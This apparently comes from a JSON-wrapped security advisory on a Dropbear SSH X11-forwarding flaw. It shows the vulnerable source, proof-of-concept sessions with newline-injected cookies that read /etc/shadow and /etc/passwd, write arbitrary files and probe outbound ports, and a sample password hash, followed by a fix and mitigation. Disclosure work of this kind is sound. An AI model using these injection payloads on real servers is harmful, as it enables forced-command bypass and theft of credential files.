(argv):1\n\t\n\tsource\t - arbitrary file read (cut on first `\\s`)\n\t\t\t# xauth source /etc/shadow\n\t\t\txauth: file /root/.Xauthority does not exist\n\t\t\txauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\"\n\t\t\t\t\t\t\n\textract - arbitrary file write \n\t\t\t * limited characters\n\t * in xauth.db format\n\t * since it is not compressed it can be combined with `xauth add` to \n\t first store data in the database and then export it to an arbitrary\n\t location e.g. 
to plant a shell or do other things.\n\t\n\tgenerate - connect to <ip>:<port> (port probing, connect back and potentially exploit\n\t\t\t vulnerabilities in X.org)\n\t\n\t\nSource\n------\n\nInline annotations are prefixed with `//#!`\n\n* handle x11 request, stores cookie in `chansess`\n\t```c\n\t/* called as a request for a session channel, sets up listening X11 */\n\t/* returns DROPBEAR_SUCCESS or DROPBEAR_FAILURE */\n\tint x11req(struct ChanSess * chansess) {\n\t\n\t\tint fd;\n\t\n\t\t/* we already have an x11 connection */\n\t\tif (chansess->x11listener != NULL) {\n\t\t\treturn DROPBEAR_FAILURE;\n\t\t}\n\t\n\t\tchansess->x11singleconn = buf_getbyte(ses.payload);\n\t\tchansess->x11authprot = buf_getstring(ses.payload, NULL);\t\t\t//#! store user tainted data\n\t\tchansess->x11authcookie = buf_getstring(ses.payload, NULL);\t\t\t//#! store user tainted data\n\t\tchansess->x11screennum = buf_getint(ses.payload);\n\t```\n\t\n* set auth cookie/authprot\n\n\t```c\n\t/* This is called after switching to the user, and sets up the xauth\n\t * and environment variables. */\n\tvoid x11setauth(struct ChanSess *chansess) {\n\t\n\t\tchar display[20]; /* space for \"localhost:12345.123\" */\n\t\tFILE * authprog = NULL;\n\t\tint val;\n\t\n\t\tif (chansess->x11listener == NULL) {\n\t\t\treturn;\n\t\t}\n\t\n\t\t...\n\t\n\t\t/* popen is a nice function - code is strongly based on OpenSSH's */\n\t\tauthprog = popen(XAUTH_COMMAND, \"w\");\t\t\t\t\t\t\t\t\t\t//#! run xauth binary\n\t\tif (authprog) {\n\t\t\tfprintf(authprog, \"add %s %s %s\\n\",\n\t\t\t\t\tdisplay, chansess->x11authprot, chansess->x11authcookie);\t\t//#! 
\\n injection in cookie, authprot\n\t\t\tpclose(authprog);\n\t\t} else {\n\t\t\tfprintf(stderr, \"Failed to run %s\\n\", XAUTH_COMMAND);\n\t\t}\n\t}\n\t```\n\nProof of Concept\n----------------\n\nPrerequisites: \n\n* install python 2.7.x\n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x\n* run `poc.py`\n\nNote: see cve-2016-3115 [3] for `poc.py`\n\n\t Usage: <host> <port> <username> <password or path_to_privkey>\n\t \n\t path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\n\t \n\npoc:\n\n1. configure one user (user1) for `force-commands`:\n\t```c \n\t#PUBKEY line - force commands: only allow \"whoami\"\n\t#cat /home/user1/.ssh/authorized_keys\n\tcommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box\n\n\t#cat /etc/passwd\n\tuser1:x:1001:1001:,,,:/home/user1:/bin/bash\n\t```\n\t \n2. run dropbearsshd (x11fwd is on by default)\n\n\t```c\n\t#> ~/dropbear-2015.71/dropbear -R -F -E -p 2222\n\t[22861] Not backgrounding\n\t[22862] Child connection from 192.168.139.1:49597\n\t[22862] Forced command 'whoami'\n\t[22862] Pubkey auth succeeded for 'user1' with key md5 dc:b8:56:71:89:36:fb:dc:0e:a0:2b:17:b9:83:d2:dd from 192.168.139.1:49597\n\t```\t\n\n3. 
`forced-commands` - connect with user1 and display env information\n\n\t```c\n\t#> python <host> 2222 user1 .demoprivkey\n\t\n\tINFO:__main__:add this line to your authorized_keys file: \n\t#PUBKEY line - force commands: only allow \"whoami\"\n\t#cat /home/user/.ssh/authorized_keys\n\tcommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\n\t\n\tINFO:__main__:connecting to: user1:<PKEY>@192.168.139.129:2222\n\tINFO:__main__:connected!\n\tINFO:__main__:\n\tAvailable commands:\n\t .info\n\t .readfile <path>\n\t .writefile <path> <data>\n\t .exit .quit\n\t <any xauth command or type help>\n\t\n\t#> .info\n\tDEBUG:__main__:auth_cookie: '\\ninfo'\n\tDEBUG:__main__:dummy exec returned: None\n\tINFO:__main__:Authority file: /home/user1/.Xauthority\n\tFile new: no\n\tFile locked: no\n\tNumber of entries: 2\n\tChanges honored: yes\n\tChanges made: no\n\tCurrent input: (stdin):2\n\tuser1\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\n\t\n\t...\n\t```\n\t\n4. `forced-commands` - read `/etc/passwd`\n\n\t```c\n\t...\n\t#> .readfile /etc/passwd\n\tDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\n\tDEBUG:__main__:dummy exec returned: None\n\tINFO:__main__:root:x:0:0:root:/root:/bin/bash\n\tdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n\tbin:x:2:2:bin:/bin:/usr/sbin/nologin\n\tsys:x:3:3:sys:/dev:/usr/sbin/nologin\n\tsync:x:4:65534:sync:/bin:/bin/sync\n\t...\n\t```\n\t\t\n5. 
`forced-commands` - write `/tmp/testfile`\n\n\t```c\n\t#> .writefile /tmp/testfile1 `thisisatestfile`\n\tDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa'\n\tDEBUG:__main__:dummy exec returned: None\n\tDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile1 127.0.0.250:65500'\n\tDEBUG:__main__:dummy exec returned: None\n\tDEBUG:__main__:user1\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\n\t\n\t#> INFO:__main__:/tmp/testfile1\n\t\n\t#> ls -lsat /tmp/testfile1\n\t4 -rw------- 1 user1 user1 59 xx xx 12:51 /tmp/testfile1\n\t\n\t#> cat /tmp/testfile1\n\t\u00fa65500hi\u00fa65500`thisisatestfile`\u00aar\n\t```\n\t\n6. `forced-commands` - initiate outbound X connection to 8.8.8.8:6100\n\n\t```c\n\t#> generate 8.8.8.8:100\n\tDEBUG:__main__:auth_cookie: '\\ngenerate 8.8.8.8:100'\n\tDEBUG:__main__:dummy exec returned: None\n\tINFO:__main__:user1\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\n\t/usr/bin/xauth: (stdin):2: unable to open display \"8.8.8.8:100\".\n\t\n\t#> tcpdump \n\tIP <host> 8.8.8.8.6100: Flags [S], seq 81800807, win 29200, options [mss 1460,sackOK,TS val 473651893 ecr 0,nop,wscale 10], length 0\n\t```\t\n\nFix\n---\n\n* Sanitize user-tainted input `chansess->x11authcookie`\n\n\nMitigation / Workaround\n------------------------\n\n* disable x11-forwarding: re-compile without x11 support: remove `options.h` -> `#define ENABLE_X11FWD`\n\nNotes\n-----\n\nThanks to the OpenSSH team for coordinating the fix!\n\nVendor response see: changelog [4]\n\n\nReferences\n----------\n\n\t[1] https://matt.ucc.asn.au/dropbear/dropbear.html\n\t[2] http://linux.die.net/man/1/xauth\n\t[3] https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115/\n\t[4] https://matt.ucc.asn.au/dropbear/CHANGES\n\t\nContact\n-------\n\n\thttps://github.com/tintinweb", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}]}